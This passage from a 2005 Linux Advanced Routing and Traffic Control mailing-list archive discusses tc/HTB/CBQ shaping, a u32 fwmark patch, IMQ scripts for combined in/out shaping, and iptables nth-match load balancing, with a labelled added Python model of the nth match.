#### Remotely VPNd SIP Phones   #####

# Ron Senykoff Home
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src XXX.XXX.XXX.XXX/32 flowid 1:5
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst XXX.XXX.XXX.XXX/32 flowid 1:5

#####################################
############### Video ###############
#                                   #

# H323 #
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 1720 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 1720 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15328 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15328 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15329 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15329 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15330 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15330 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15331 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15331 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 15332 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 15332 0xffff flowid 1:6

tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 3230 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 3230 0xffff flowid 1:6
# .
# . shortened for posting purposes
# .
# .
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip sport 3247 0xffff flowid 1:6
tc filter add dev $e protocol ip parent 1:0 prio 2 u32 match ip dport 3247 0xffff flowid 1:6

#####################################
############ Sametime ###############
#                                   #

tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip src $SAMETIME/32 flowid 1:7
tc filter add dev $e protocol ip parent 1:0 prio 1 u32 match ip dst $SAMETIME/32 flowid 1:7

#####################################
######### Bulk / Default ############
#                                   #

tc filter add dev $e protocol ip parent 1:0 prio 3 u32 match ip src 0.0.0.0/0 flowid 1:9
tc filter add dev $e protocol ip parent 1:0 prio 3 u32 match ip dst 0.0.0.0/0 flowid 1:9


From shemminger@osdl.org Wed Jan 5 23:44:56 2005
From: shemminger@osdl.org (Stephen Hemminger)
Date: Wed, 5 Jan 2005 15:44:56 -0800
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <41DC00E0.2070300@dsl.pipex.com>
References: <41DC00E0.2070300@dsl.pipex.com>
Message-ID: <20050105154456.38b6838a@dxpl.pdx.osdl.net>

On Wed, 05 Jan 2005 14:59:44 +0000
Andy Furniss wrote:

> Catalin(ux aka Dino) BOIE wrote:
> > Hello, Stephen, List!
> >
> > Attached is the patch for iproute2 to add the possibility to use fwmark
> > in u32 filters.
> > The kernel part was included in 2.6.10.
> >
> > Please apply!
> > Thank you!
> >
> > For more info:
> > - Kernel patch (not needed for 2.6.10):
> > http://kernel.umbrella.ro/net/mark_in_u32/net-match-nfmark-in-u32.patch
> >
> > - Examples:
> > http://kernel.umbrella.ro/net/mark_in_u32/examples.txt
> >
> > ---
> > Catalin(ux aka Dino) BOIE
> > catab at deuroconsult.ro
> > http://kernel.umbrella.ro/
>
> That looks handy :-) Do you know why fw mark doesn't work with policers
> in 2.6 (assuming it's not just me)
>
> To stephen - I may be wrong here but in the readme it says that default
> kernel include is /usr/src/linux/include but if I grep for
> KERNEL_INCLUDE I see :-
>
> ./Makefile:KERNEL_INCLUDE:=/usr/include
> ./Makefile:CFLAGS = $(CCOPTS) -I$(KERNEL_INCLUDE) -I../include $(DEFINES)
> ./Makefile: ./configure $(KERNEL_INCLUDE)
> ./README:KERNEL_INCLUDE should point to correct linux kernel include
> directory.

I changed away from Alexey's old KERNEL_INCLUDE, because it was necessary
for the package to be able to be compiled without depending on the kernel
header files. There were cases where new features needed to be compiled on
old systems where the definition was missing. Think about building current
iproute2 util's with 2.4.20 includes.

The current solution (though less than ideal) was to put stripped down
version of the routing specific includes into the iproute2 package.

From Zhenyu Wu

Jonathan,

Yes, I think you are right, RED can be applied to any qdisc. The "RED"
you mentioned here is the RED algorithm, right? I know, in linux kernel
(sch_red.c), which implements the RED algorithm, just indeed uses a FIFO
queue, do you think so? So, if there are several RED qdiscs which attach
to different classes, a scheduling mechanism is needed, right? If what i
have said is right, it seems that there are no scheduler mechanisms for
several FIFO qdiscs(or RED qdiscs) in linux kernel. Of course, as we can
see, CBQ which can be regard as a scheduling queue also has a scheduler
mechanisms WRR.
But if the FIFO is attached to the CBQ classes, then, when CBQ schedule
different queues(FIFOs) using WRR, will the packets in different queues
are scheduled in turn? In another condition, if i add a scheduling
mechanism such as WRR behind all FIFOs, i can use this mechanism to
schedule the packets in different queues, are there are any difference?

Thank you very much!

Regards,
Zhenyu Wu

> I may be wrong on this, but I believe that RED can be
> attached to any queueing system, including the basic
> FIFO queues. In a sense, you're still using a
> scheduling system, when using the default arrangement,
> it's just a first-come, first-served one.
>
> RED is classless and applies to the whole of a queue.
> What that queue is attached to, if I understand it
> correctly, isn't important. It can be a class, but it
> can just as easily be everything going through that
> device.
>
> Again, someone correct me if I'm wrong, but as I
> understand it, there are four levels to the whole
> QoS/diffserv concept.
>
> One of these levels is the queueing discipline. This
> can be something like CBQ, WFQ, FIFO, PRIO, or
> whatever. This is how the data is organized, it does
> not describe how the data is sent. In the case of
> something like CBQ, you have a defined set of queues
> in parallel, with rules as to what packets fall into
> what queue. On the other hand, queueing schemes such
> as FIFO are flat. There's a single queue that
> everything goes through, though there may be different
> rules for how things get pushed to it.
>
> Another level is the scheduling mechanism. This
> describes how the data is sent, once organized, but
> does not describe the organization itself. If you've
> only one queue, then there's really not much to
> schedule. If you've multiple queues, then it's fairly
> normal to use "round robin" or "weighted round robin"
> to pick which queue to pull a packet from. Linux' CBQ
> uses "weighted round robin", according to the C file.
>
> The next level is the packet dropping mechanism. When
> queues flood, packets are going to be dropped. There's
> nowhere to store them. I'm pretty sure the default
> behaviour is to simply continue accepting packets, but
> to drop any that expire before being sent or which
> fall off the end of the queue (if the queue is
> bounded). RED, GRED, and a whole host of similar
> mechanisms, try to drop packets in a more controlled
> manner. However, that is really all they do.
>
> Finally, there are mechanisms for damping overly
> active applications, such as ECN. The idea here is
> that if you throttle back whatever is generating
> excess traffic, you don't get the problems associated
> with dealing with it. The "default" behaviour is to do
> nothing.
>
> When setting up QoS - on Linux or anything else - you
> basically pick one of each of the four categories to
> assemble a packet delivery system. Even without QoS,
> you're doing that, you're just using the defaults in
> all cases. The mechanisms are still going to be there.
>
> The Linux configuration menu does NOT match the above
> terminology, or the terminology in the source code.
> Thus, the source code identifies CBQ as a queueing
> discipline, but the configuration menu calls it a
> scheduler. The QoS help is also not very helpful, as
> it mostly tells people to look at the source. However,
> if you look at the source for CBQ or RED, for example,
> the explanation is relative to the cited papers, so
> you then have to go and read those before coming back
> and doing anything.
>
> This is one area I hope is going to get resolved in
> the reasonably near future. If not, I might have to
> come up with a patch myself. The very thought of that
> should send shivers down the spines of any kernel
> developers out there.
>
> Jonathan
>
> --- Zhenyu Wu wrote:
>
> > Thank you very much, i will try to find these papers
> > which must be very helpful
> > for me.
> > The "more" means that whether there are
> > other mechanisms not only for
> > Linux. Sorry, i have not make it clear! Sometimes, i
> > wonder whether the qdiscs
> > such as CBQ, RED, GRED ... are belong to the
> > scheduler mechanisms in linux
> > environment. For example, In Red, which i can find
> > are enqueue, and dequeue.... so,
> > if i add a RED qdisc to a class, must i add a
> > scheduler mechanism so that i can
> > decide which packet in the queues will be scheduled
> > and put to the link?
> >
> > Good luck,
> > Best,

From andy.furniss@dsl.pipex.com Thu Jan 6 08:53:41 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 06 Jan 2005 08:53:41 +0000
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <20050105154456.38b6838a@dxpl.pdx.osdl.net>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105154456.38b6838a@dxpl.pdx.osdl.net>
Message-ID: <41DCFC95.20207@dsl.pipex.com>

Stephen Hemminger wrote:
> On Wed, 05 Jan 2005 14:59:44 +0000
> Andy Furniss wrote:
>
>
>>Catalin(ux aka Dino) BOIE wrote:
>>
>>>Hello, Stephen, List!
>>>
>>>Attached is the patch for iproute2 to add the possibility to use fwmark
>>>in u32 filters.
>>>The kernel part was included in 2.6.10.
>>>
>>>Please apply!
>>>Thank you!
>>>
>>>For more info:
>>>- Kernel patch (not needed for 2.6.10):
>>>http://kernel.umbrella.ro/net/mark_in_u32/net-match-nfmark-in-u32.patch
>>>
>>>- Examples:
>>>http://kernel.umbrella.ro/net/mark_in_u32/examples.txt
>>>
>>>---
>>>Catalin(ux aka Dino) BOIE
>>>catab at deuroconsult.ro
>>>http://kernel.umbrella.ro/
>>
>>That looks handy :-) Do you know why fw mark doesn't work with policers
>>in 2.6 (assuming it's not just me)
>>
>>To stephen - I may be wrong here but in the readme it says that default
>>kernel include is /usr/src/linux/include but if I grep for
>>KERNEL_INCLUDE I see :-
>>
>>./Makefile:KERNEL_INCLUDE:=/usr/include
>>./Makefile:CFLAGS = $(CCOPTS) -I$(KERNEL_INCLUDE) -I../include $(DEFINES)
>>./Makefile: ./configure $(KERNEL_INCLUDE)
>>./README:KERNEL_INCLUDE should point to correct linux kernel include
>>directory.
>
>
> I changed away from Alexey's old KERNEL_INCLUDE, because it was necessary
> for the package to be able to be compiled without depending on the kernel
> header files. There were cases where new features needed to be compiled on
> old systems where the definition was missing. Think about building current
> iproute2 util's with 2.4.20 includes.
>
> The current solution (though less than ideal) was to put stripped down
> version of the routing specific includes into the iproute2 package.
>

Ahh I see, thanks for the explanation.

Andy.

From andy.furniss@dsl.pipex.com Thu Jan 6 09:00:23 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 06 Jan 2005 09:00:23 +0000
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <41DC1880.6090405@dsl.pipex.com>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com>
Message-ID: <41DCFE27.4030704@dsl.pipex.com>

Andy Furniss wrote:
> Thomas Graf wrote:
>>
>> Do you see the police/action stats being updated? i.e. does
>> the matching itself work?
>
>
> From memory yes - counters showed OK on iptables and tc -s qdisc ls dev
> eth0 just no drops
>
> I'll repeat tonight to be sure.

I retried with a vanilla 2.6.10 + iptables 1.2.11 on a different box and
it is the same.

The only difference between working and not working cases when using tc
-s qdisc ls dev eth0 is the drops count. The stats are OK apart from that.

Andy.

From jan.rovner@diadema.cz Thu Jan 6 09:30:54 2005
From: jan.rovner@diadema.cz (Jan Rovner)
Date: Thu, 6 Jan 2005 10:30:54 +0100
Subject: [LARTC] Shaping the sum of in/out traffic (IMQ?)
Message-ID:

Hello,

does anyone have a working solution for the shaping both incoming and
outgoing traffic in such way, that for a given class the sum of incoming
and outgoing traffic is specified?

My ISP does the same thing, it gives me just a line of a defined rate,
no matter the traffic direction (i.e. here is the line, the clock speed
is 1024kbps, do what you want).

I'm a little bit familiar with HTB on Linux, my download shaping works
fine. However, I would like to shape both incoming+outgoing traffic in a
way that the sum of actual outgoing and incoming rates of all classes
would be always below the ISP's line speed in order to shaping get
working.

In other words, I would like to split the ISP's line into a bunch of
hierarchical "virtual" lines with traffic borrowing and other features
like HTB does for download, but with total (in+out) rates.

Maybe something like IMQ would work, but unfortunately I have found no
example for that situation.

Any ideas?
Jan Rovner

From andy.furniss@dsl.pipex.com Thu Jan 6 09:44:25 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 06 Jan 2005 09:44:25 +0000
Subject: [LARTC] Load Balance Outbound AND Inbound Internet Traffic to one location over multiple links
In-Reply-To:
References: <41C97943.3000003@dsl.pipex.com> <41CF1920.6040307@dsl.pipex.com>
Message-ID: <41DD0879.7040307@dsl.pipex.com>

Joe Nuts wrote:
> Thanks again for the response, Andy.
> I've done a tremendous amount of research, and set-up to test the
> multi-link ppp, and I still have not been successful in my search.
> The problem i've found out from working with ppp, and pppoe, is that I
> can only create a ppp connection between two devices on the same
> broadcast network. I.E. two devices connected by some kind of bridged
> ethernet.
> This wouldn't be an option for me, because the DSL connections to the
> client make it to the ISP over an ATM line, directly to a router. The
> router plugs in to a layer-2 switch, which then our server plugs in
> to.
> I would need to create maybe a GRE tunnel from the client to the
> server, so that the pppoe client requests would make it to the server,
> to then create the ppp connection.
>
> And that's just to get the one connection going, i'd like to be able
> to multilink multiple connections.
>
> If there were some way to multilink gre (or IPIP) tunnels, to get
> combined bandwidth on single connections, that would be ideal. But I
> have not found any solutions along those lines.
> My next attempts will be multilink pppoe tunnels over gre tunnels, and
> I'm also researching what BSD has to offer in that arena.
>
> Any suggestions are welcome.

I don't know whether you can link tunnels or not.

Another way you could look into is doing it at IP level using the
netfilter patch Nth.
You could just round robin packets over the links - not as nice as
multilink as packet size isn't accounted for, but may be OK in practise.

Below is the help for it - You may not need to do the NAT but AIUI you
could use it to mark and then route using the marks.

Andy.

Author: Fabrice MARIE
Status: Works For Me.

This option adds CONFIG_IP_NF_MATCH_NTH, which supplies a match module
that will allow you to match every Nth packet encountered. By default
there are 16 different counters that can be used.

This match functions in one of two ways
1) Match every Nth packet, and only the Nth packet.
   example:
     iptables -t mangle -A PREROUTING -m nth --every 10 -j DROP
   This rule will drop every 10th packet.
2) Unique rule for every packet. This is an easy and quick method to
   produce load-balancing for both inbound and outbound.
   example:
     iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \
       --every 3 --packet 0 -j SNAT --to-source 10.0.0.5
     iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \
       --every 3 --packet 1 -j SNAT --to-source 10.0.0.6
     iptables -t nat -A POSTROUTING -o eth0 -m nth --counter 7 \
       --every 3 --packet 2 -j SNAT --to-source 10.0.0.7
   This example evenly splits connections between the three SNAT
   addresses.

By using the mangle table and iproute2, you can setup complex
load-balanced routing. There's lot of other uses. Be creative!

Supported options are:
   --every Nth      Match every Nth packet
  [--counter] num   Use counter 0-15 (default:0)
  [--start] num     Initialize the counter at the number 'num'
                    instead of 0. Must be between 0 and Nth-1
  [--packet] num    Match on 'num' packet. Must be between 0
                    and Nth-1.
                    If --packet is used for a counter than
                    there must be Nth number of --packet
                    rules, covering all values between 0 and
                    Nth-1 inclusively.

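Added example (not part of the post above or of the nth patch): a small Python model of the --every/--packet mode described in the help text, run over constructed packet sizes. The counter behaviour (it advances only when a rule matches) is an assumption inferred from that help text, not taken from the module source; the model shows that the split is even by packet count but not by bytes, and what happens when one --packet rule is missing.

```python
"""Model of the nth match's --every/--packet mode (assumed semantics)."""
from collections import Counter

# The three --packet rules from the help text: (--packet value, SNAT source).
RULES = [(0, "10.0.0.5"), (1, "10.0.0.6"), (2, "10.0.0.7")]

# Constructed traffic: one full-size data packet followed by two small ACKs,
# repeated 100 times. Not captured data.
CONSTRUCTED_SIZES = [1500, 40, 40] * 100


class NthCounter:
    """One shared counter, as selected by --counter in the rules."""

    def __init__(self, every, start=0):
        if every < 1 or not 0 <= start < every:
            raise ValueError("--start must be between 0 and Nth-1")
        self.every = every
        self.value = start

    def match(self, packet):
        """Return True if a rule with this --packet value matches now."""
        if not 0 <= packet < self.every:
            raise ValueError("--packet must be between 0 and Nth-1")
        if self.value != packet:
            return False
        # Assumption: the counter only moves on when a rule matched.
        self.value = (self.value + 1) % self.every
        return True


def dispatch(sizes, rules, every=3, start=0):
    """Walk each packet through the rule list; first matching rule wins."""
    counter = NthCounter(every, start)
    packets, octets = Counter(), Counter()
    for size in sizes:
        for packet, target in rules:
            if counter.match(packet):
                break  # SNAT is a terminating target
        else:
            target = "unmatched"  # fell through every nth rule
        packets[target] += 1
        octets[target] += size
    return dict(packets), dict(octets)


def byte_share(octets):
    """Percentage of all bytes carried per target, rounded to 0.1."""
    total = sum(octets.values())
    return {t: round(100 * n / total, 1) for t, n in octets.items()}


if __name__ == "__main__":
    pkts, octs = dispatch(CONSTRUCTED_SIZES, RULES)
    print("packets per source:", pkts)
    print("byte share (%):   ", byte_share(octs))

    # Misconfiguration: the rule for --packet 2 is missing, so the counter
    # stops at 2 and nothing matches any more.
    pkts, _ = dispatch(CONSTRUCTED_SIZES, RULES[:2])
    print("with one rule missing:", pkts)
```

In the nat table only the first packet of a connection reaches these rules, so there the units being distributed are connections rather than packets, which is what the help text means by "evenly splits connections".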
From tgraf@suug.ch Thu Jan 6 09:50:09 2005
From: tgraf@suug.ch (Thomas Graf)
Date: Thu, 6 Jan 2005 10:50:09 +0100
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <41DCFE27.4030704@dsl.pipex.com>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com>
Message-ID: <20050106095009.GU26856@postel.suug.ch>

* Andy Furniss <41DCFE27.4030704@dsl.pipex.com> 2005-01-06 09:00
> I retried with a vanilla 2.6.10 + iptables 1.2.11 on a different box and
> it is the same.

2 options:
 1) get latest -bk snapshot and apply http://people.suug.ch/~tgr/patches/pending/
    The patchset fixes a lot of small issues, adds action capabilities to
    all classifiers, and extends tcindex and route classifier to be changeable
    during runtime. If problem remains, go to 2.
 2) Provide detailed information about how your police configuration
    looks like, whether you are using CONFIG_NET_CLS_ACT, etc. so I can fix it.

> The only difference between working and not working cases when using tc
> -s qdisc ls dev eth0 is the drops count. The stats are OK apart from that.

And it is definitely classifier specific to fw?

From andy.furniss@dsl.pipex.com Thu Jan 6 13:27:24 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 06 Jan 2005 13:27:24 +0000
Subject: [LARTC] [PATCH] mark in u32
In-Reply-To: <20050106095009.GU26856@postel.suug.ch>
References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch>
Message-ID: <41DD3CBC.1010108@dsl.pipex.com>

Thomas Graf wrote:
> * Andy Furniss <41DCFE27.4030704@dsl.pipex.com> 2005-01-06 09:00
>
>>I retried with a vanilla 2.6.10 + iptables 1.2.11 on a different box and
>>it is the same.
>
>
> 2 options:
> 1) get latest -bk snapshot and apply http://people.suug.ch/~tgr/patches/pending/
> The patchset fixes a lot of small issues, adds action capabilities to
> all classifiers, and extends tcindex and route classifier to be changeable
> during runtime. If problem remains, go to 2.

Could take some time - I don't have bitkeeper and will have to find some disk space. I'll try soon(ish).

> 2) Provide detailed information about how your police configuration
> looks like, whether you are using CONFIG_NET_CLS_ACT, etc. so I can fix it.

I just tried some variations - but get an error - I am using new tc and get

RTNETLINK answers: Invalid argument
We have an error talking to the kernel

with the last 2 - see below.

>
>
>>The only difference between working and not working cases when using tc
>>-s qdisc ls dev eth0 is the drops count. The stats are OK apart from that.
>
>
> And it is definitely classifier specific to fw?

I don't know what should I test with :-)

tc filter add dev eth0 parent ffff: protocol ip prio 1 u32 match ip src 0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1

Works OK.

tc filter add dev eth0 parent ffff: protocol 6 prio 1 u32 match ip src 0.0.0.0/0 police rate 100kbit burst 10k drop flowid :1

Doesn't work even on 2.4 that fw test works on.

[andy@amd ~]$ grep NET_CLS /boot/config-lfs-5.1-2.4.26
CONFIG_NET_CLS=y
CONFIG_NET_CLS_TCINDEX=m
CONFIG_NET_CLS_ROUTE4=m
CONFIG_NET_CLS_ROUTE=y
CONFIG_NET_CLS_FW=m
CONFIG_NET_CLS_U32=m
CONFIG_NET_CLS_RSVP=m
CONFIG_NET_CLS_RSVP6=m
CONFIG_NET_CLS_POLICE=y

Is the 2.4 that's OK.
[andy@amd ~]$ grep NET_CLS /boot/config-2.6.10
CONFIG_NET_CLS=y
CONFIG_NET_CLS_TCINDEX=m
CONFIG_NET_CLS_ROUTE4=m
CONFIG_NET_CLS_ROUTE=y
CONFIG_NET_CLS_FW=m
CONFIG_NET_CLS_U32=m
# CONFIG_NET_CLS_IND is not set
CONFIG_NET_CLS_RSVP=m
CONFIG_NET_CLS_RSVP6=m
CONFIG_NET_CLS_ACT=y

Is the fail on fw but work on ip src 0.0.0.0/0

Below are the ones that throw an error when I tc filter add (anything)

tc qdisc add dev eth0 handle ffff: ingress is OK

[andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-2
CONFIG_NET_CLS=y
CONFIG_NET_CLS_TCINDEX=m
CONFIG_NET_CLS_ROUTE4=m
CONFIG_NET_CLS_ROUTE=y
CONFIG_NET_CLS_FW=m
CONFIG_NET_CLS_U32=m
# CONFIG_NET_CLS_IND is not set
CONFIG_NET_CLS_RSVP=m
CONFIG_NET_CLS_RSVP6=m
# CONFIG_NET_CLS_ACT is not set
CONFIG_NET_CLS_POLICE=y

[andy@amd ~]$ grep NET_CLS /boot/config-2.6.10-3
CONFIG_NET_CLS=y
CONFIG_NET_CLS_TCINDEX=m
CONFIG_NET_CLS_ROUTE4=m
CONFIG_NET_CLS_ROUTE=y
CONFIG_NET_CLS_FW=m
CONFIG_NET_CLS_U32=m
# CONFIG_NET_CLS_IND is not set
CONFIG_NET_CLS_RSVP=m
CONFIG_NET_CLS_RSVP6=m
CONFIG_NET_CLS_ACT=y
CONFIG_NET_CLS_POLICE=y

From andy.furniss@dsl.pipex.com Thu Jan 6 13:51:05 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Thu, 06 Jan 2005 13:51:05 +0000
Subject: [LARTC] Shaping the sum of incoming and outgoing traffic
In-Reply-To:
References:
Message-ID: <41DD4249.4070305@dsl.pipex.com>

Jan Rovner wrote:
> Hello,
>
> does anyone have a working solution for the shaping both incoming and
> outgoing traffic in such
> way, that for a given client the *sum* of incoming and outgoing traffic
> is somehow defined?
>
> My ISP does the same thing, it gives me just a line of a defined rate,
> no matter the traffic
> direction (i.e. here is your line, the clock speed is 1024kbps, do what
> you want).
>
> I'm a little bit familiar with HTB, my download shaping works fine.
> However, I would like shape
> both incoming+outgoing traffic in a way that the sum of actual outgoing
> and incoming rates
> of all my clients would be always below the ISP's line speed in order to
> shaping get working.
>
> In other words, I would like to split the ISP's line into a bunch of
> hierarchical "virtual" lines
> with traffic borrowing etc. like HTB does for download, but with defined
> *total* rates (i.e. dear
> customer, here is your 128kbps line, do what you want).
>
> What can I do with HTB is to shape incoming and traffic separately
> (somehow to virtually split
> the line for upload/download with limited speeds), but this is not the
> way I would like it to be, since
> would like to get the line used as effective as possible.
>
> Maybe something like IMQ would work, but unfortunately I have found no
> example for
> that solution.
>
> Any ideas?
>
> Jan Rovner

I did this as a proof of concept a while ago, but never finished it. It works but I didn't prioritise empty acks so testing both ways with TCP will fall apart - but then it does on a full duplex connection.

Remember it's a test and I can't even remember the detail so you will need to modify a lot - INPUT/OUTPUT etc for real world.

Andy.
#!/bin/bash
#set -x
IPTABLES=/usr/local/sbin/iptables
MODPROBE=/sbin/modprobe
IP=/usr/sbin/ip
TC=/usr/sbin/tc

# Remove the rules and the imq0 device left by a previous run (errors ignored).
$IPTABLES -t mangle -D INPUT -i eth0 -j MARK --set-mark 1 &> /dev/null
$IPTABLES -t mangle -D OUTPUT -o eth0 -j MARK --set-mark 2 &> /dev/null
$IPTABLES -t mangle -D POSTROUTING -m mark --mark 1 -j IMQ --todev 0 &> /dev/null
$IPTABLES -t mangle -D POSTROUTING -m mark --mark 2 -j IMQ --todev 0 &> /dev/null
$IP link set imq0 down &> /dev/null
$MODPROBE -r imq &> /dev/null

if [ "$1" = "stop" ]
then
    echo "stopping"
    exit
fi

$MODPROBE imq numdevs=1

# Mark traffic in on eth0 as 1 and traffic out on eth0 as 2, then send both marks to imq0.
$IPTABLES -t mangle -I INPUT -i eth0 -j MARK --set-mark 1
$IPTABLES -t mangle -I OUTPUT -o eth0 -j MARK --set-mark 2
$IPTABLES -t mangle -I POSTROUTING -m mark --mark 1 -j IMQ --todev 0
$IPTABLES -t mangle -I POSTROUTING -m mark --mark 2 -j IMQ --todev 0

$IP link set imq0 up

# One HTB tree on imq0: both directions borrow from the same 128kbit parent.
$TC qdisc add dev imq0 root handle 1:0 htb default 0
$TC class add dev imq0 parent 1:0 classid 1:1 htb rate 128kbit ceil 128kbit burst 2k

#### down ####
$TC class add dev imq0 parent 1:1 classid 1:10 htb rate 64kbit ceil 128kbit
$TC filter add dev imq0 parent 1:0 prio 1 protocol ip handle 1 fw flowid 1:10

#### up ####
$TC class add dev imq0 parent 1:1 classid 1:20 htb rate 64kbit ceil 128kbit
$TC filter add dev imq0 parent 1:0 prio 1 protocol ip handle 2 fw flowid 1:20

From util@deuroconsult.ro Thu Jan 6 13:58:40 2005
From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE)
Date: Thu, 6 Jan 2005 15:58:40 +0200 (EET)
Subject: [LARTC] Shaping the sum of incoming and outgoing traffic
In-Reply-To:
References:
Message-ID:

> Hello,

Hello!

See also http://www.docum.org/docum.org/faq/cache/69.html

I cannot find one example on the new but maybe you have time to figure out how it works.
---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/

From andre.correa@pobox.com Thu Jan 6 14:54:24 2005
From: andre.correa@pobox.com (Andre Correa)
Date: Thu, 06 Jan 2005 12:54:24 -0200
Subject: [LARTC] Strange filter behavior
In-Reply-To: <200410121632.38611.alg0@iit.demokritos.gr>
References: <200410121632.38611.alg0@iit.demokritos.gr>
Message-ID: <41DD5120.9030209@pobox.com>

Hi list, I'm in trouble with a scenario and would like to know if you guys can help me explain and work it out:

I need to put some customers in a class of, let's say, 1Mbit/s and try to guarantee them a percentage of the bandwidth. So I came up with the following scenario

# root stuff
tc qdisc add dev eth0 root handle 1: htb default 2
tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit

# default class
tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit

# root class for this "guaranteed bandwidth" service
tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit

# class for this 1Mbit shared bandwidth
tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit

# qdisc used to _make my life easier numbering customer classes_
tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250

# default class for this second qdisc
tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit

# each customer gets the following class and filter
tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit
tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst xxx.xxx.xxx.xxx/yy flowid 1024:1

# another customer...
tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit
tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst www.www.www.www/zzz flowid 1024:2

First, these filters don't work, all traffic goes to 1:2. Why?
I can filter traffic to any class at 1:? but not to classes below the second qdisc (1:1024). Shouldn't I make this filter pointing to 1024: as the parent? It doesn't let me do it...

Any help?

Tks for your help and attention.

ADC

From msuzen@kibris.net Thu Jan 6 15:33:01 2005
From: msuzen@kibris.net (Mehmet Ali Suzen)
Date: Thu, 6 Jan 2005 17:33:01 +0200 (EET)
Subject: [LARTC] tc and ntop inconsistent data flow
Message-ID: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net>

Dear List,
Sorry for the duplicated email but I couldn't get any answer.

I am trying to limit some IP blocks with tc with following three step.

# interface
tc qdisc add dev eth0 root handle 1: cbq avpkt 1000 bandwidth 256kbit
# class
tc class add dev eth0 parent 1: classid 1:1 cbq rate 64kbit \
   allot 1500 prio 5 bounded isolated
# rules
# download
tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \
   match ip dst 10.0.1.0/24 flowid 1:1
# upload
tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \
   match ip src 10.0.1.0/24 flowid 1:1

Problem is when I try to measure traffic with ntop (www.ntop.org), it is seen that overall traffic which that ip block limited to is much higher than 64kbit, actually it is about 500Kbps which signifies that tc do not limit properly. What could be the reason of this inconsistency? How could I limit 64 Kbps? Is the above configuration correct?

Many thanks for any kind of comment why it is different?
-Mehmet

PS: tc -s class show dev eth0 shows that I got the following

[root@nat root]# /usr/local/sbin/traffic-limit.sh status
class cbq 1: root rate 168Kbit (bounded,isolated) prio no-transmit
 Sent 6068639 bytes 5841 pkts (dropped 0, overlimits 0)
  borrowed 0 overactions 0 avgidle 38094 undertime 0
class cbq 1:1 parent 1: rate 8Kbit (bounded,isolated) prio 5
 Sent 1460691 bytes 3174 pkts (dropped 0, overlimits 12339)
  borrowed 0 overactions 1372 avgidle -115477 undertime -33146
class cbq 1:2 parent 1: rate 8Kbit (bounded,isolated) prio 5
 Sent 2336291 bytes 3192 pkts (dropped 0, overlimits 32606)
  borrowed 0 overactions 2376 avgidle 38094 undertime 0
class cbq 1:3 parent 1: rate 84Kbit (bounded,isolated) prio 5
 Sent 3125820 bytes 4851 pkts (dropped 0, overlimits 1053)
  borrowed 0 overactions 521 avgidle 2631 undertime 0
class cbq 1:4 parent 1: rate 8Kbit (bounded,isolated) prio 5
 Sent 217663 bytes 496 pkts (dropped 0, overlimits 3553)
